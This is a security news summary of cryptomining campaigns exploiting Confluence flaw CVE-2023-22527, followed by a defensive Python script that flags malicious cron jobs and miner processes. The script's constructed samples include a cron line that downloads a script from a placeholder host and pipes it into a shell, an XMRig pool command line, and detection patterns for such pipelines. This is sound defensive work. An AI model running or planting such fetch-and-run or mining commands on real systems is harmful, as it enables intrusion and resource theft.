August 30, 2024 at 02:42AM
Threat actors are exploiting a patched critical security flaw in Atlassian Confluence Data Center and Confluence Server to conduct illicit cryptocurrency mining. The flaw, CVE-2023-22527, allows unauthenticated attackers to achieve remote code execution. At least three different threat actors are exploiting this vulnerability using various methods. Users are advised to update to the latest versions to minimize risks.
Based on the meeting notes from Aug 30, 2024, the key points are:
– Threat actors are actively exploiting a critical security flaw (CVE-2023-22527) in Atlassian Confluence Data Center and Confluence Server to conduct illicit cryptocurrency mining.
– The attacks involve methods such as deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes, and maintaining persistence via cron jobs.
– Trend Micro researcher Abdelrahman Esmail highlighted the severity of the vulnerability and observed a high number of exploitation attempts between mid-June and end of July 2024.
– At least three different threat actors are said to be behind the malicious activity, using various techniques to exploit the vulnerability and launch the XMRig miner.
– Esmail emphasized the need for organizations to update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible to minimize the associated risks and threats.
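The notes above describe the post-exploitation footprint rather than the Confluence bug itself: a scheduled job that re-fetches a shell script, a miner binary dropped in a scratch directory, and a web-application service account running something other than Java. The triage script below is an added example, not code from the original report or from Trend Micro. It parses constructed crontab text and a constructed process listing (none of the hostnames, paths or PIDs are real indicators) and flags the patterns the notes mention. The service account name `confluence` and the install prefix `/opt/atlassian/confluence/` are assumptions; adjust them to the host being examined.

```python
"""
Host triage for the cron-persistence and XMRig patterns summarised above.
Added example; all sample data below is constructed, not real indicators.
"""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass, field

# Directories a legitimate scheduled task or service binary rarely executes from.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# A path segment that starts with "." (e.g. /tmp/.hidden/...).
HIDDEN_PATH = re.compile(r"/\.[^./\s]")
# Download-and-execute pipeline: curl/wget output piped straight into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b")
# Miner-style command lines: a known miner binary name or a pool-style "-o host:port".
MINER_BINARIES = ("xmrig",)
POOL_ARG = re.compile(r"(?:^|\s)-o\s+\S+:\d{2,5}\b")

# Constructed sample crontab (placeholder host, not a real IoC).
SAMPLE_CRONTAB = """
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://placeholder.example/x.sh | sh
@reboot /tmp/.hidden/update.sh
"""

# Constructed sample process listing: (pid, user, command line).
SAMPLE_PROCESSES = [
    (1234, "confluence", "/opt/atlassian/confluence/jre/bin/java -Xms1024m -Xmx1024m org.apache.catalina.startup.Bootstrap start"),
    (2345, "confluence", "/tmp/.hidden/xmrig -o pool.placeholder.example:3333 --donate-level 1"),
    (3456, "root", "/usr/sbin/sshd -D"),
]


@dataclass
class Finding:
    source: str
    item: str
    reasons: list[str] = field(default_factory=list)


def parse_crontab(text: str):
    """Yield (schedule, command) pairs, skipping comments and blank lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):  # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield sched, cmd.strip()


def suspicious_cron_entries(text: str) -> list[Finding]:
    """Flag cron jobs that fetch-and-run remote code or execute from scratch/hidden paths."""
    findings = []
    for sched, cmd in parse_crontab(text):
        reasons = []
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("downloads remote content and pipes it into a shell")
        if any(d in cmd for d in UNTRUSTED_DIRS) or HIDDEN_PATH.search(cmd):
            reasons.append("executes from a world-writable or hidden directory")
        # @reboot alone is common for legitimate agents; only note it alongside another signal.
        if reasons and sched == "@reboot":
            reasons.append("re-launches at boot (persistence)")
        if reasons:
            findings.append(Finding("cron", f"{sched} {cmd}", reasons))
    return findings


def suspicious_processes(procs, service_user="confluence",
                         install_prefix="/opt/atlassian/confluence/") -> list[Finding]:
    """Flag miner-like processes and anything the app service account runs outside its install."""
    findings = []
    for pid, user, cmdline in procs:
        argv = shlex.split(cmdline)
        if not argv:
            continue
        exe = argv[0]
        name = exe.rsplit("/", 1)[-1].lower()
        reasons = []
        if name in MINER_BINARIES:
            reasons.append(f"known miner binary name: {name}")
        if POOL_ARG.search(cmdline) or "--donate-level" in argv:
            reasons.append("mining-pool style arguments")
        if exe.startswith(UNTRUSTED_DIRS) or HIDDEN_PATH.search(exe):
            reasons.append("binary lives in a world-writable or hidden directory")
        if user == service_user and not exe.startswith(install_prefix):
            reasons.append(f"runs as {service_user} but outside {install_prefix}")
        if reasons:
            findings.append(Finding("process", f"pid {pid} ({user}): {cmdline}", reasons))
    return findings


if __name__ == "__main__":
    for f in suspicious_cron_entries(SAMPLE_CRONTAB) + suspicious_processes(SAMPLE_PROCESSES):
        print(f"[{f.source}] {f.item}\n    " + "\n    ".join(f.reasons))
```

The service-account check is the one worth keeping even after the miner names change: a Confluence node's service user should be running the bundled JVM and little else, so any other executable under that account is a cheap, indicator-independent signal. Run the same functions over `crontab -l` output for every user (plus `/etc/cron.d`) and a `ps -eo pid,user,args` capture from the host.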